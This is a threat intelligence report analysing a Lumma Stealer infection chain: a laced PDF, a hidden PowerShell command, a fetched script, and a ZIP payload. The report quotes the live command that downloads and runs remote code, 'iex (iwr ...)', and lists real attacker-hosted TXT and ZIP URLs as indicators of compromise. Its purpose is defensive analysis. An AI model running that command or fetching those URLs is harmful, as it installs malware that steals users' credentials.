In the Wild Lumma Stealer Analysis Report

Incident Overview

This report covers a credential-stealing malware identified through Shield Security Operation team, named Lumma Stealer. The user downloaded a laced pdf file which leveraged PowerShell script to fetch a TXT file and then downloaded and executed a malicious ZIP file. Detailed analysis reveals the sequence of processes involved and the execution of suspicious commands. The following sections describe each stage of the attack and its associated indicators.

The Threat Intelligence team at Shield53 has identified multiple similar attacks, with Indicators of Attack displaying a short lifespan of 4 to 8 hours. Threat actor groups are frequently rotating links and resources to evade detection.

Detection Summary

Processes Involved:

  • explorer.exe

  • powershell.exe

  • Set-up.exe

  • more.com

Command Execution

The suspicious process powershell.exe was triggered with a hidden window and executed the following encoded command:

Powershell

“C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe” -W Hidden -eC iex (iwr https://iilp.b-cdn.net/kolo26.txt -UseBasicParsing).Content

Analysis:

This command uses Invoke-Expression (iex) to run a PowerShell command directly from the output of Invoke-WebRequest (iwr). The PowerShell script fetches a TXT file from the URL:

https*:*//iilp*.*b-cdn*.*net/kolo26*.*txt

Retrieved Script  Analysis (kolo26.txt):

The TXT file, upon analysis, contained the following script:

Malicious ZIP File URL: https://261024vexea.b-cdn.net/lopi100.zip

  • Download Path: $env:TEMP\pgl.zip

  • Extraction Path: $env:TEMP\file

  • Execution Path: $env:TEMP\file\Set-up.exe

This script downloads a ZIP file, extracts its contents, and launches the executable Set-up.exe, indicating a classic delivery method for malware to evade initial detection and execute the payload.

Execution and Analysis

The final payload, Set-up.exe, was executed after extraction. Further details from the AnyRun sandbox environment provide insights into the behavior of this executable and its role in the credential-stealing process.

Indicators of Compromise (IOCs)

PowerShell Command

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe -W Hidden -eC iex (iwr https://iilp.b-cdn.net/kolo26.txt -UseBasicParsing).Content

TXT File URL

https://iilp.b-cdn.net/kolo26.txt

ZIP File URL

https://261024vexea.b-cdn.net/lopi100.zip

File Path

C:\Windows\SysWOW64\more.com

Analysis Links: